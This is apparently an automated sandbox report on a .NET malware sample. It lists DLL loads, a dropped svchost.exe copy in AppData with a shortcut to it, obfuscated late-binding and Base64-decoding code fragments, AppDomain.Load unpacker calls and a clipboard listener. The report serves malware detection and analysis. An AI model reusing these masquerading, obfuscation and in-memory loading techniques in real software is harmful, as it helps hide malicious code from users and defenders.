Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\svchost.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\svchost.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\svchost.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\svchost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\svchost.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\svchost.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\svchost.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\svchost.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\svchost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\svchost.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\svchost.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\svchost.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32

Jump to behavior

Source: svchost.lnk.0.dr

LNK file: ..\..\..\..\..\..\Local\svchost.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: file.exe, S9v6FPHPOdsnN8wBs54k2fCeDH2LfA4Ua448M7mpbxghnhim.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ZsxvaOwO9GZDCq1vhOEiPsaOtfpGyCPBxKAftjzq0RZ5Uj7emntLjaQhD4BZNs8tJaYPG7iVKE.RNjBuCeTZYIun9E53FfX1OsyTO2DnyAN6BQIjKCystVf7fPsw1HXZouBKxLdqvdYkPc7khqTrK,ZsxvaOwO9GZDCq1vhOEiPsaOtfpGyCPBxKAftjzq0RZ5Uj7emntLjaQhD4BZNs8tJaYPG7iVKE.bi6cdzt7Ywd1g8e1Cq80Xl38CPDvRM4iRVPu3JyjtGFTW6QSLOTosjbFg1FwUdJAvqxHBHIseH,ZsxvaOwO9GZDCq1vhOEiPsaOtfpGyCPBxKAftjzq0RZ5Uj7emntLjaQhD4BZNs8tJaYPG7iVKE.LQpKx3GXNkqDhLsBSbBsMCr5D7li68PkDW207eCSLdbwPkhg5YYrXdhTC2EO2kKGsv6DJCY4li,ZsxvaOwO9GZDCq1vhOEiPsaOtfpGyCPBxKAftjzq0RZ5Uj7emntLjaQhD4BZNs8tJaYPG7iVKE.A8J9clTkRbTjq5n2bj2GX8aNTHu8LKOol3LSLKYDXjKDcBL9XeYqgKm4wJI5NohZnMALvb4mfO,qfyXcGSO3n7MPwJUdF1pWpSgkJoqnG02l2.UEyH2gVbBguCzQIaFjgN9VKXo49VIR9eo8()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: file.exe, S9v6FPHPOdsnN8wBs54k2fCeDH2LfA4Ua448M7mpbxghnhim.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{NxU4LPwpKcjzEIxtJPWLhbmlv6cjHgnBUa68TNLD7JBtlmTN[2],qfyXcGSO3n7MPwJUdF1pWpSgkJoqnG02l2.BCwC9znM7KwZ11s7K03hIg34Tx0w5fBH4R(Convert.FromBase64String(NxU4LPwpKcjzEIxtJPWLhbmlv6cjHgnBUa68TNLD7JBtlmTN[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: svchost.exe.0.dr, S9v6FPHPOdsnN8wBs54k2fCeDH2LfA4Ua448M7mpbxghnhim.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ZsxvaOwO9GZDCq1vhOEiPsaOtfpGyCPBxKAftjzq0RZ5Uj7emntLjaQhD4BZNs8tJaYPG7iVKE.RNjBuCeTZYIun9E53FfX1OsyTO2DnyAN6BQIjKCystVf7fPsw1HXZouBKxLdqvdYkPc7khqTrK,ZsxvaOwO9GZDCq1vhOEiPsaOtfpGyCPBxKAftjzq0RZ5Uj7emntLjaQhD4BZNs8tJaYPG7iVKE.bi6cdzt7Ywd1g8e1Cq80Xl38CPDvRM4iRVPu3JyjtGFTW6QSLOTosjbFg1FwUdJAvqxHBHIseH,ZsxvaOwO9GZDCq1vhOEiPsaOtfpGyCPBxKAftjzq0RZ5Uj7emntLjaQhD4BZNs8tJaYPG7iVKE.LQpKx3GXNkqDhLsBSbBsMCr5D7li68PkDW207eCSLdbwPkhg5YYrXdhTC2EO2kKGsv6DJCY4li,ZsxvaOwO9GZDCq1vhOEiPsaOtfpGyCPBxKAftjzq0RZ5Uj7emntLjaQhD4BZNs8tJaYPG7iVKE.A8J9clTkRbTjq5n2bj2GX8aNTHu8LKOol3LSLKYDXjKDcBL9XeYqgKm4wJI5NohZnMALvb4mfO,qfyXcGSO3n7MPwJUdF1pWpSgkJoqnG02l2.UEyH2gVbBguCzQIaFjgN9VKXo49VIR9eo8()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: svchost.exe.0.dr, S9v6FPHPOdsnN8wBs54k2fCeDH2LfA4Ua448M7mpbxghnhim.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{NxU4LPwpKcjzEIxtJPWLhbmlv6cjHgnBUa68TNLD7JBtlmTN[2],qfyXcGSO3n7MPwJUdF1pWpSgkJoqnG02l2.BCwC9znM7KwZ11s7K03hIg34Tx0w5fBH4R(Convert.FromBase64String(NxU4LPwpKcjzEIxtJPWLhbmlv6cjHgnBUa68TNLD7JBtlmTN[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: file.exe, S9v6FPHPOdsnN8wBs54k2fCeDH2LfA4Ua448M7mpbxghnhim.cs	.Net Code: h2K9gOohbq3M8rqAOafDLLs5Pt18vNON3CimuQRt64O2Q78C System.AppDomain.Load(byte[])
Source: file.exe, S9v6FPHPOdsnN8wBs54k2fCeDH2LfA4Ua448M7mpbxghnhim.cs	.Net Code: _1BAWRDjVJ7Ll0s3RDD6t7gfucqfwOMgHc07WGINbGHSNHnGi System.AppDomain.Load(byte[])
Source: file.exe, S9v6FPHPOdsnN8wBs54k2fCeDH2LfA4Ua448M7mpbxghnhim.cs	.Net Code: _1BAWRDjVJ7Ll0s3RDD6t7gfucqfwOMgHc07WGINbGHSNHnGi
Source: svchost.exe.0.dr, S9v6FPHPOdsnN8wBs54k2fCeDH2LfA4Ua448M7mpbxghnhim.cs	.Net Code: h2K9gOohbq3M8rqAOafDLLs5Pt18vNON3CimuQRt64O2Q78C System.AppDomain.Load(byte[])
Source: svchost.exe.0.dr, S9v6FPHPOdsnN8wBs54k2fCeDH2LfA4Ua448M7mpbxghnhim.cs	.Net Code: _1BAWRDjVJ7Ll0s3RDD6t7gfucqfwOMgHc07WGINbGHSNHnGi System.AppDomain.Load(byte[])
Source: svchost.exe.0.dr, S9v6FPHPOdsnN8wBs54k2fCeDH2LfA4Ua448M7mpbxghnhim.cs	.Net Code: _1BAWRDjVJ7Ll0s3RDD6t7gfucqfwOMgHc07WGINbGHSNHnGi

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FFD9A3B2859 push ebx; retf	0_2_00007FFD9A3B28CA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FFD9A3B3D1D push ebx; ret	0_2_00007FFD9A3B3D2A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9A2CD2A5 pushad ; iretd	1_2_00007FFD9A2CD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9A4B2316 push 8B485F92h; iretd	1_2_00007FFD9A4B231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD9A2BD2A5 pushad ; iretd	4_2_00007FFD9A2BD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD9A4A2316 push 8B485F93h; iretd	4_2_00007FFD9A4A231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFD9A2AD2A5 pushad ; iretd	7_2_00007FFD9A2AD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFD9A492316 push 8B485F94h; iretd	7_2_00007FFD9A49231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9A29D2A5 pushad ; iretd	11_2_00007FFD9A29D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9A3B0E10 push eax; retf	11_2_00007FFD9A3B0E1D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9A482316 push 8B485F95h; iretd	11_2_00007FFD9A48231B

Source: file.exe, H6T3tP17TmcZ3WvcUbNe0fKNqn2xzzv9gr.cs	High entropy of concatenated method names: '_9la3kYFUFspNKtsyfk1E68GOJuw43oK1IO', 'LSGXadrUAzufBD7TZ7mCREp4xPYvmu8G8D', 'bSK2fMHxHTmyXK3cMhtrLNbpafqBDr7JAu', 'P6s6CpsDBfG', 'Xv32KgMzRSG', 'rrxf2jUb73w', '_30TXgtLPnfu', 'rUZPrBZ90ST', '_3Hg0sOIo9S0', '_3k9ihuiJKJJ'
Source: file.exe, ZsxvaOwO9GZDCq1vhOEiPsaOtfpGyCPBxKAftjzq0RZ5Uj7emntLjaQhD4BZNs8tJaYPG7iVKE.cs	High entropy of concatenated method names: 'kxNS7DRtyiZO1GgmJ4IPz80LkqLVuL12dSF0n806TsutGb99Ot26vknO81wFV7WJUV', 'QdKXWgjPHty3ZYgA7efLbafkJtZoIzle68O6oS5vwthbTixJEKpyqifHg8pHVbvUlS', '_3FRPZFR131NguWWpsElDs1MtJwcglFyJgvhQDQFPeNIJzLmX4B5SWxIhyH9ZfFMb5q', 'QIXBrzcJairtR0abmwC056OU82Tta2CabXpMloLgqmN7iy4ymyAg3RYPGajdMXJ3BO'
Source: file.exe, 70vQK4T18Gm0g4mAwA32uNHAReNFu5quyXyREL1YB99jawH4E8OZaSohyRuIt66XAYe04IU0tt.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_8ibCuAx1thyoSp5nckruyTswUpc446mqXpfqG9V7VwnsLuLJCaMAvu93190jiY8hle', 'eCLAUtM40b0FqUn2h1klKYw5KLkvfp483TJe3w6xFIWcOeWuFnSoBphQnRkysF5UzA', 'JYbSleVMv2LageDeGehPYB3feoigP2jPD76rHDcooMKKy1W2FvCupCmQM2CvhVsBXU', 'L61pK1ZAKqzpW72rMXu1U8uCioQoiIB64eQmOOxYbaf7Cdby3Rw5yreXQsZACuD3uJ'
Source: file.exe, UeVea6O6GzmMbCRBxlRfSNhZOZxIujfjvVpWRPCUkEVlV052.cs	High entropy of concatenated method names: '_6m0nJorGnpvswOX8eTX7z9Jp6tf7aDa0LusUiMEjACi1ZWk1', 'r0pEYKWjoIfZuGhxYjfk76zAJP', 'vQp5CyD8U1RRU3aqr5weYDugZZ', 'iKrmP7AV8J1WsUQQ9H0G1qZDzk', 'XghfxRpplj8uNeGNl1H9PDimZe'
Source: file.exe, hqiedDAFT8Px8D3Ghu7ypyyCQyfPNzWS3H.cs	High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'OYDQIkmJMPpKj3GYltxlBI1B5qyTqZSCqO', 'wsOb73YquTz', 'g4n1nVSNwNC', 'xj5A49ghaEp', 'CyONxGZgX18'
Source: file.exe, S9v6FPHPOdsnN8wBs54k2fCeDH2LfA4Ua448M7mpbxghnhim.cs	High entropy of concatenated method names: 'EdFW4YFiSkbQxZ5d4qQmNPsN9soOEYTNdl5vCM4WrlKuS4o1', 'h2K9gOohbq3M8rqAOafDLLs5Pt18vNON3CimuQRt64O2Q78C', 'ogt4WZTPLCR5Ukdw7p4iVE3U3QNF7gwgfMYTtSczP5CH3PFs', 'IyVRozfUAwV4BczlXzm2h5AOSZ87wZ948X6yw1dpAxtrYCru', '_5FGhL3XPfMlotCKdM8AAb0pHLX9Eoh5KypoNiPXgT9DiPnDy', 'Tm71IDO5pxQrhw3HDy4qsXciC1HiKFCvkUCA2wqdyyA74uvn', 'XDUHRjTdEJPyG37IJbtt5SqhShsRBRfj86oLaoJcaDxkZpXv', '_60O1mRAd4ikIerIYomRmHVz5e2a7e9pXqTWgJH8IDiW3rI7J', 'ixCDJqfXOtGwj8HnnZUHghcmsyPXXguAkKqwPfPdZG3Hrd7I', '_5JBaulXVr29IhqORj1mx6IDOjqrbHPXtHMBKvn3LucPwz7td'
Source: file.exe, ke6P6rtJCZBKy9hI.cs	High entropy of concatenated method names: 'Q10pC7edpYffdkZt', '_89UNfPpYp8CTinab', 'KzyZGapq70hkl1dS', 'lky8iSY3iXulBwHF', 'N1HydT3ak1CsVszy', 'hKtyQaSs1hTUBOzM', 'vWbfcf1dfJjBXq1n', 'DFEQrXpV8G4QwS8L', 'PzbEQa2Mmk3GohKZ', 'yAgoQ4Abcp3IXEMi'
Source: file.exe, TnghBFUTZVgmG5vF.cs	High entropy of concatenated method names: 'ZVO1ubevYLCMbR9I', 'BerbwhxOL6fpJIUg', 'Dwn2XH6PT1c7QjLz', 'XeacGh5DgP0xISpI', 'dTgH8hOARwOQAnZo', 'nfisZZbXZIqOti1g', 'WB5Z308EPrPWnLlG', 'YT5OUy07NebW69WYkUnO8cVr4CGe7jGkd4X79tAdSbvwRIy88OFyM83ZNjnWLGsW1e', 'Xi2oD40emha77cFmVAWidnim9la1yWOfNQrAIu9bmxcqOIIKTT5W4OZzeszzjCcbV6', 'wV8RExrWHEePxD8tFZSvesDMCzUgIeaGh5oCOBu8e1mJxDlXyQNvS70v5WlOIcigo1'
Source: file.exe, Ov5jMSR8vkyDZYBx5fGlGH5gNTyZ71EQKT.cs	High entropy of concatenated method names: 'U3LqZaYOrYlmJECKaIdCxggvmvLxsV89zn', 'dliJf69zCLyqTsFaZCo6JAZbFJV4qsxJ8t', 'VHtdfhVhMn43Pu1x6JtNuLlSekwln4O10m', 'Eag0t8thTS5YV5bSB1spMnsfRYPlrHT0kc', 'mS6Gf4WirHQ', 'ZdHOGgcYdMo', 'vVgCkvlUn8u', 'vH4QfFczzMn', '_4tubCRheGoN', 'rBdc6l9Y29C'
Source: file.exe, nMYIDkarGL7TGc5L58MQaBjripxccmCr6ipNleJlm20t3SaA.cs	High entropy of concatenated method names: 'UcZXNi7ukRB8NdzY8y1O6D1PfsixKLgyMChiO4efH2dCfBo7', 'vPoRkSXHwBF0Ckqt4K3N4mYzcHMQSKILLECQtUsxDJdpZNsZ', 'P4t4HZ5HHObv6AsQIFrHmQ8jIgSiYaPsFbhdJiiGWGTFjuGt', 'MBbUboIbkN6zFEObqIoKkwIXOZ2UA6bVfrIwzULhRmMVj5pH', 'WYjtZRRhzZ9b6kFyTUFljqxLODSbhL6btWvYvrinDRuykMBs', 'o5wZmlreA0t971kCFsBb0CbzG5S8aqTH2c4KqPPsef72cgoS', 'v6J9NL7s5HlK9Btg48oGayCKz2qSI6ZVtpR6pEENIYH8zWKi', 'NeacyHjERGErWPVrNOcCTlMq46dgzyaVgr6HGoWnxpHPoT5P', 'A4fh471c8kpO2KmXpaE86Bou0xxh9D5BOap8H4xmim25Hf6L', 'ZWqcdYnIg62jUlW5M8qWFlgjAE951btOlp44FcpRHUJD6LKX'
Source: file.exe, qfyXcGSO3n7MPwJUdF1pWpSgkJoqnG02l2.cs	High entropy of concatenated method names: 'i7cyD0XTLEB0Eo6PcSMqpwbf4hMZg4sLYG', 'ygPwp9XZp1CNtXOvYnoSnk60K0pR4EzVwC', 'rDdzoPBPDGIhemY4IkLdEpjByHJCZf9ZZk', 'iayxv8iOD5PJUikNajoF8bAzd4OR0W1BOJ', '_5qRtMLOzp6vegzQlmGY0VvqtTEVxrzkOnV', 'sxvswXulgNMspyjbFclySjAL0qULrND153', 'ZkGh8jLFkXbpaAG3167hzW7mElum0Gzy4o', 'U0SMh7MOgaMA9emgAlTtfkDQ8K2p40TY3n', 'V9zlnJ7JAd6MhnJZXfbmyCeUH9Fp8zg3RZ', '_1kXGJPvV0iV4mL17w9kNyBIfBwGJWszAhI'
Source: svchost.exe.0.dr, H6T3tP17TmcZ3WvcUbNe0fKNqn2xzzv9gr.cs	High entropy of concatenated method names: '_9la3kYFUFspNKtsyfk1E68GOJuw43oK1IO', 'LSGXadrUAzufBD7TZ7mCREp4xPYvmu8G8D', 'bSK2fMHxHTmyXK3cMhtrLNbpafqBDr7JAu', 'P6s6CpsDBfG', 'Xv32KgMzRSG', 'rrxf2jUb73w', '_30TXgtLPnfu', 'rUZPrBZ90ST', '_3Hg0sOIo9S0', '_3k9ihuiJKJJ'
Source: svchost.exe.0.dr, ZsxvaOwO9GZDCq1vhOEiPsaOtfpGyCPBxKAftjzq0RZ5Uj7emntLjaQhD4BZNs8tJaYPG7iVKE.cs	High entropy of concatenated method names: 'kxNS7DRtyiZO1GgmJ4IPz80LkqLVuL12dSF0n806TsutGb99Ot26vknO81wFV7WJUV', 'QdKXWgjPHty3ZYgA7efLbafkJtZoIzle68O6oS5vwthbTixJEKpyqifHg8pHVbvUlS', '_3FRPZFR131NguWWpsElDs1MtJwcglFyJgvhQDQFPeNIJzLmX4B5SWxIhyH9ZfFMb5q', 'QIXBrzcJairtR0abmwC056OU82Tta2CabXpMloLgqmN7iy4ymyAg3RYPGajdMXJ3BO'
Source: svchost.exe.0.dr, 70vQK4T18Gm0g4mAwA32uNHAReNFu5quyXyREL1YB99jawH4E8OZaSohyRuIt66XAYe04IU0tt.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_8ibCuAx1thyoSp5nckruyTswUpc446mqXpfqG9V7VwnsLuLJCaMAvu93190jiY8hle', 'eCLAUtM40b0FqUn2h1klKYw5KLkvfp483TJe3w6xFIWcOeWuFnSoBphQnRkysF5UzA', 'JYbSleVMv2LageDeGehPYB3feoigP2jPD76rHDcooMKKy1W2FvCupCmQM2CvhVsBXU', 'L61pK1ZAKqzpW72rMXu1U8uCioQoiIB64eQmOOxYbaf7Cdby3Rw5yreXQsZACuD3uJ'
Source: svchost.exe.0.dr, UeVea6O6GzmMbCRBxlRfSNhZOZxIujfjvVpWRPCUkEVlV052.cs	High entropy of concatenated method names: '_6m0nJorGnpvswOX8eTX7z9Jp6tf7aDa0LusUiMEjACi1ZWk1', 'r0pEYKWjoIfZuGhxYjfk76zAJP', 'vQp5CyD8U1RRU3aqr5weYDugZZ', 'iKrmP7AV8J1WsUQQ9H0G1qZDzk', 'XghfxRpplj8uNeGNl1H9PDimZe'
Source: svchost.exe.0.dr, hqiedDAFT8Px8D3Ghu7ypyyCQyfPNzWS3H.cs	High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'OYDQIkmJMPpKj3GYltxlBI1B5qyTqZSCqO', 'wsOb73YquTz', 'g4n1nVSNwNC', 'xj5A49ghaEp', 'CyONxGZgX18'
Source: svchost.exe.0.dr, S9v6FPHPOdsnN8wBs54k2fCeDH2LfA4Ua448M7mpbxghnhim.cs	High entropy of concatenated method names: 'EdFW4YFiSkbQxZ5d4qQmNPsN9soOEYTNdl5vCM4WrlKuS4o1', 'h2K9gOohbq3M8rqAOafDLLs5Pt18vNON3CimuQRt64O2Q78C', 'ogt4WZTPLCR5Ukdw7p4iVE3U3QNF7gwgfMYTtSczP5CH3PFs', 'IyVRozfUAwV4BczlXzm2h5AOSZ87wZ948X6yw1dpAxtrYCru', '_5FGhL3XPfMlotCKdM8AAb0pHLX9Eoh5KypoNiPXgT9DiPnDy', 'Tm71IDO5pxQrhw3HDy4qsXciC1HiKFCvkUCA2wqdyyA74uvn', 'XDUHRjTdEJPyG37IJbtt5SqhShsRBRfj86oLaoJcaDxkZpXv', '_60O1mRAd4ikIerIYomRmHVz5e2a7e9pXqTWgJH8IDiW3rI7J', 'ixCDJqfXOtGwj8HnnZUHghcmsyPXXguAkKqwPfPdZG3Hrd7I', '_5JBaulXVr29IhqORj1mx6IDOjqrbHPXtHMBKvn3LucPwz7td'
Source: svchost.exe.0.dr, ke6P6rtJCZBKy9hI.cs	High entropy of concatenated method names: 'Q10pC7edpYffdkZt', '_89UNfPpYp8CTinab', 'KzyZGapq70hkl1dS', 'lky8iSY3iXulBwHF', 'N1HydT3ak1CsVszy', 'hKtyQaSs1hTUBOzM', 'vWbfcf1dfJjBXq1n', 'DFEQrXpV8G4QwS8L', 'PzbEQa2Mmk3GohKZ', 'yAgoQ4Abcp3IXEMi'
Source: svchost.exe.0.dr, TnghBFUTZVgmG5vF.cs	High entropy of concatenated method names: 'ZVO1ubevYLCMbR9I', 'BerbwhxOL6fpJIUg', 'Dwn2XH6PT1c7QjLz', 'XeacGh5DgP0xISpI', 'dTgH8hOARwOQAnZo', 'nfisZZbXZIqOti1g', 'WB5Z308EPrPWnLlG', 'YT5OUy07NebW69WYkUnO8cVr4CGe7jGkd4X79tAdSbvwRIy88OFyM83ZNjnWLGsW1e', 'Xi2oD40emha77cFmVAWidnim9la1yWOfNQrAIu9bmxcqOIIKTT5W4OZzeszzjCcbV6', 'wV8RExrWHEePxD8tFZSvesDMCzUgIeaGh5oCOBu8e1mJxDlXyQNvS70v5WlOIcigo1'
Source: svchost.exe.0.dr, Ov5jMSR8vkyDZYBx5fGlGH5gNTyZ71EQKT.cs	High entropy of concatenated method names: 'U3LqZaYOrYlmJECKaIdCxggvmvLxsV89zn', 'dliJf69zCLyqTsFaZCo6JAZbFJV4qsxJ8t', 'VHtdfhVhMn43Pu1x6JtNuLlSekwln4O10m', 'Eag0t8thTS5YV5bSB1spMnsfRYPlrHT0kc', 'mS6Gf4WirHQ', 'ZdHOGgcYdMo', 'vVgCkvlUn8u', 'vH4QfFczzMn', '_4tubCRheGoN', 'rBdc6l9Y29C'
Source: svchost.exe.0.dr, nMYIDkarGL7TGc5L58MQaBjripxccmCr6ipNleJlm20t3SaA.cs	High entropy of concatenated method names: 'UcZXNi7ukRB8NdzY8y1O6D1PfsixKLgyMChiO4efH2dCfBo7', 'vPoRkSXHwBF0Ckqt4K3N4mYzcHMQSKILLECQtUsxDJdpZNsZ', 'P4t4HZ5HHObv6AsQIFrHmQ8jIgSiYaPsFbhdJiiGWGTFjuGt', 'MBbUboIbkN6zFEObqIoKkwIXOZ2UA6bVfrIwzULhRmMVj5pH', 'WYjtZRRhzZ9b6kFyTUFljqxLODSbhL6btWvYvrinDRuykMBs', 'o5wZmlreA0t971kCFsBb0CbzG5S8aqTH2c4KqPPsef72cgoS', 'v6J9NL7s5HlK9Btg48oGayCKz2qSI6ZVtpR6pEENIYH8zWKi', 'NeacyHjERGErWPVrNOcCTlMq46dgzyaVgr6HGoWnxpHPoT5P', 'A4fh471c8kpO2KmXpaE86Bou0xxh9D5BOap8H4xmim25Hf6L', 'ZWqcdYnIg62jUlW5M8qWFlgjAE951btOlp44FcpRHUJD6LKX'
